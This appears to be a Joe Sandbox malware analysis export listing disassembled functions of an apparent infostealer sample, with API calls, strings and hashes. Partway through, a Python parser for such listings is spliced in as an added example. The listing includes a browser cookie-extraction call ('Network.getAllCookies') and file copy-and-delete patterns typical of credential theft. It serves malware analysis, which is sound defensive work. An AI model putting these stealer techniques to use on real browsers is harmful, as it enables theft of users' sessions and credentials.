• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: stack backtrace:
• API String ID: 0-2306486365
• Opcode ID: 4a686de6e333f371c9feaeecd7442eab6c097d6686ad7879b95d50e6ec828b68
• Instruction ID: 766eb078a367cab0f712caf79b380d3e786a79df39e9059eb0484a49c68e11d1
• Opcode Fuzzy Hash: 4a686de6e333f371c9feaeecd7442eab6c097d6686ad7879b95d50e6ec828b68
• Instruction Fuzzy Hash: F6F18E75C05B88CFDB22CFB4C8407DABBF0AF1A304F04869ED999AB652D734A545CB61
APIs
• _strlen.LIBCMT ref: 6CD11F7E
• closesocket.WS2_32(?), ref: 6CD121B9
• closesocket.WS2_32(?), ref: 6CD122D9
  • Part of subcall function 6CD1AC00: HeapFree.KERNEL32(00000000,0000000C), ref: 6CD4EBD8
Strings
• {"id": 1, "method": "Network.getAllCookies"}Failed to convert result to CStringmy_library\src\lib.rs, xrefs: 6CD1209C
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: closesocket$FreeHeap_strlen
• String ID: {"id": 1, "method": "Network.getAllCookies"}Failed to convert result to CStringmy_library\src\lib.rs
• API String ID: 4163113487-637580131
• Opcode ID: f0b1e58b948f7a91dd5c14b9c6fd501c7ebc61dba063095fe29564f311222089
• Instruction ID: a6de652ff7276c7308fb0cf98c8de5664c6ffedbd627dd4ca1444adbc8993653
• Opcode Fuzzy Hash: f0b1e58b948f7a91dd5c14b9c6fd501c7ebc61dba063095fe29564f311222089
• Instruction Fuzzy Hash: 70C157B5404B009BD3A0DF25E988B97B7F8FB15318F404A1DE99B86E61EB71F548CB60
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: stack backtrace:
• API String ID: 0-2306486365
• Opcode ID: d006c33414565a74846b04d5927f98f8d3d1f13a967c69174ace62e99600ea29
• Instruction ID: 86c9488173e91c71272bc3eca8db2c70acb5973b663c9123f7626ff4a459bc11
• Opcode Fuzzy Hash: d006c33414565a74846b04d5927f98f8d3d1f13a967c69174ace62e99600ea29
• Instruction Fuzzy Hash: CB919DB5904B848FD722CF64C840B96BBF4AF0A314F048A5ED9DA9BB61D734F509CB61
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00FF02BD
  • Part of subcall function 0100E698: std::exception::exception.LIBCMT ref: 0100E6AD
  • Part of subcall function 0100E698: __CxxThrowException@8.LIBCMT ref: 0100E6C2
  • Part of subcall function 0100E698: std::exception::exception.LIBCMT ref: 0100E6D3
• __EH_prolog3_catch.LIBCMT ref: 00FF035C
• std::_Xinvalid_argument.LIBCPMT ref: 00FF0370
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
• String ID: vector<T> too long
• API String ID: 2448322171-3788999226
                                                                                                                                                                                                                                                          • Opcode ID: 1c8215a9adfc3c6fc3c72087bc37694c2846789dcb774c4329d76625077cd668
                                                                                                                                                                                                                                                          • Instruction ID: b13bf673e94d98fb261d5e16a308920d014035c55ade8fb6bc019192f6b051e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8215a9adfc3c6fc3c72087bc37694c2846789dcb774c4329d76625077cd668
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D931C536E502199FDB24EF68E8496BD77A5AB04714F14202EF700E72D6DB749D80DB90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00FF6FAA
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,0000001C), ref: 00FF6FB5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF7039
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                                                                                          • Opcode ID: 3728be980596e35ca54fb565131b053cca37455af65dd6d5388067074e653bc5
                                                                                                                                                                                                                                                          • Instruction ID: f6e58e0c624a645363802a72116ae7eb1944a523f9600c356df9d941bad7e4d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3728be980596e35ca54fb565131b053cca37455af65dd6d5388067074e653bc5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E114C7280050A9FCB50FB74ED066ADBBB4BF04310B904525EA14B7162EB39AA25EFC0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree), ref: 6CD64FCF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree,00000000,?,6CD63F04), ref: 6CD64FD9
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CD65001
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                          • Opcode ID: 1914f65c652693fcea41d3884fe2a9ac7d949893b2ae8052832d80b749b9914f
                                                                                                                                                                                                                                                          • Instruction ID: d110400f108e1a9f2e4518271c13ed89a2ae103c7ea1bdd4372e332c000e31f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1914f65c652693fcea41d3884fe2a9ac7d949893b2ae8052832d80b749b9914f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E01A30744248B7FF112FA2DD09B893E69AB01B84F244A20FA4EE8CA1E771E955D6D4
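The function entries in this listing are only useful to an analyst once they can be queried: which call site compares a buffer against a literal (the StrCmpCA against "ERROR" at 00FF7039 is the kind of check a stealer makes on a C2 reply), which dump each function was lifted from, and what the fuzzy hashes are for pivoting. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses entries of this shape into records and answers those questions. The line grammar it assumes ("Name.MODULE(args), ref: addr" bullets under "APIs", "Key: value" bullets elsewhere, a "Download File" link label trailing each "Associated" line in the raw web export) is inferred from the listing on this page, and the embedded sample text is copied from two of the entries above with their "Associated" lists trimmed.

```python
"""Parse Joe Sandbox disassembly function entries into queryable records.
Added example, not Joe Sandbox code. The line grammar is an assumption
inferred from the listing on this page."""
import re
from dataclasses import dataclass, field

# "• StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF7039"  or  "• wsprintfW.USER32 ref: 00FF1FA7"
API_RE = re.compile(r"^(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9_]*)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
COMPARE_PREFIXES = ("StrCmp", "lstrcmp", "strcmp", "wcscmp", "_stricmp", "CompareString")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]   # '?' marks an argument the disassembler could not resolve
    ref: str          # address of the call site inside the dump


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""                                    # image base of the dump
    associated: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # API ID, String ID, hashes, ...

    def literal_args(self) -> list[str]:
        """Resolved call-site arguments that are neither '?' nor a bare hex number.
        (A literal made only of hex digits, e.g. 'DEAD', would be misread as a number.)"""
        return sorted({a for c in self.apis for a in c.args
                       if a != "?" and not HEX_RE.match(a)})


def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":                 # every entry opens with its APIs block
                entries.append(FunctionEntry())
            section = line
            continue
        if not line.startswith("•") or not entries:
            continue                           # blank line, prose, or text before the first entry
        body, entry = line[1:].strip(), entries[-1]
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                entry.apis.append(ApiCall(m["name"], m["module"], args, m["ref"].upper()))
            continue
        if section == "Strings":
            entry.strings.append(body)
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip().removesuffix("Download File").strip()
        if key == "Source File":               # "<dump>.sdmp, Offset: 00FE0000, based on PE: true"
            entry.source_file = value.split(",")[0]
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", value)
            entry.offset = off[1].upper() if off else ""
        elif key == "Associated":
            entry.associated.append(value)
        else:
            entry.meta[key] = value
    return entries


def literal_compares(entries: list[FunctionEntry]) -> list[tuple[str, str, str]]:
    """Compare-style calls with a resolved literal operand, e.g. StrCmpCA(?, 'ERROR').
    In a stealer these call sites are the first place to look for the C2 reply handling."""
    return [(c.ref, c.name, a) for e in entries for c in e.apis
            if c.name.startswith(COMPARE_PREFIXES)
            for a in c.args if a != "?" and not HEX_RE.match(a)]


# Constructed sample: two entries copied from the listing, "Associated" lists trimmed.
SAMPLE = """\
APIs
• __EH_prolog3_catch.LIBCMT ref: 00FF6FAA
• lstrlenA.KERNEL32(?,0000001C), ref: 00FF6FB5
• StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF7039
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchlstrlen
• String ID: ERROR
• API String ID: 591506033-2861137601
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree), ref: 6CD64FCF
• GetLastError.KERNEL32(?,6CD64F73,00000000,?,00000001,?,?,?,6CD65062,00000001,FlsFree,6CDAE690,FlsFree,00000000,?,6CD63F04), ref: 6CD64FD9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CD65001
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
"""
```

Run `parse_entries(SAMPLE)` on the whole exported listing and `literal_compares(...)` returns the call sites worth opening first in the disassembler; `entry.offset` tells you which dump to load them from, and `entry.meta["Opcode ID"]` and the fuzzy hashes are the values to pivot on across other reports.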
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF26D3,?), ref: 00FF1F8F
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF1F96
                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00FF1FA7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocProcesswsprintf
• String ID: %hs
• API String ID: 659108358-2783943728
• Opcode ID: 973e3cc5bb13119cd32e4a2b0e4b035d26708dd17176d3b243469c9e4f78866d
• Instruction ID: 2b5e5bbf5e211007085b7ffe43836e3351fe219c55efb663ae8f46636f44eeca
• Opcode Fuzzy Hash: 973e3cc5bb13119cd32e4a2b0e4b035d26708dd17176d3b243469c9e4f78866d
• Instruction Fuzzy Hash: 12D0A7313402167BC6316BD5BC0EF9A3F5CDB05BA2F000020FF4DD9144C96A541057D5
APIs
• GetConsoleOutputCP.KERNEL32(9F8E84B1,00000000,00000000,?), ref: 6CD6A905
  • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CD6AB57
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CD6AB9D
• GetLastError.KERNEL32 ref: 6CD6AC40
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: f3948bb81c82466bea6af4fbf8a430c950d13771ca660d8c6b4ba9fb1b757418
• Instruction ID: 2ee8d9d0f4754bc0da77bd848fe23a82e992c121d520733b30bfea415e7bf164
• Opcode Fuzzy Hash: f3948bb81c82466bea6af4fbf8a430c950d13771ca660d8c6b4ba9fb1b757418
• Instruction Fuzzy Hash: 31D19DB5D01259DFCB05CFA9C8809EDBBB5EF09304F24412AE56AEBB51D730A945CB60
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEB200
• lstrlenA.KERNEL32(?), ref: 00FEB3B6
• lstrlenA.KERNEL32(?), ref: 00FEB3D1
• DeleteFileA.KERNEL32(?), ref: 00FEB423
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
• Opcode ID: 83cf8b0a4f45b14328dd40a6f52970e1c5e22b0bf7adf70b41a9cf27d9cc5706
• Instruction ID: 246c50c74c87438f3b0dff39239ddf5e03cb1e2336df878996916ac360193d2b
• Opcode Fuzzy Hash: 83cf8b0a4f45b14328dd40a6f52970e1c5e22b0bf7adf70b41a9cf27d9cc5706
• Instruction Fuzzy Hash: C781A53290015D9BCF40FBB6ED469EEB775AF04301F614421FA00B7167DBA9BE06AB91
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEB511
• lstrlenA.KERNEL32(?), ref: 00FEB663
• lstrlenA.KERNEL32(?), ref: 00FEB67E
• DeleteFileA.KERNEL32(?), ref: 00FEB6D0
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
• Opcode ID: e140e7ceb40b091bb59ad58644843db6c4ff65c5619e323e1c2a6cbc880e037c
• Instruction ID: df9b60b906e37b6886d3575d751311801eba5bd55688adf71ae50c38f3f27319
• Instruction Fuzzy Hash: 0871D83290015D9BCF40FBB6ED469EEB775AF04301F514421FA00B7166EBB9BE06AB91
APIs
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 1b2c967479369c5e3501ea2e6e8b3dd3746eaf2dccc3ba3d1688b424ba5a80d3
• Instruction ID: 79da5024ecd63b07e54d6973caccfa22e25411be30f0a4043c73e27f76d2ab2d
• Instruction Fuzzy Hash: 0B51E476606612EFEB15CF56D860BAA77B4FF01319F20452DE89547EB0D731E884CBA0
APIs
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
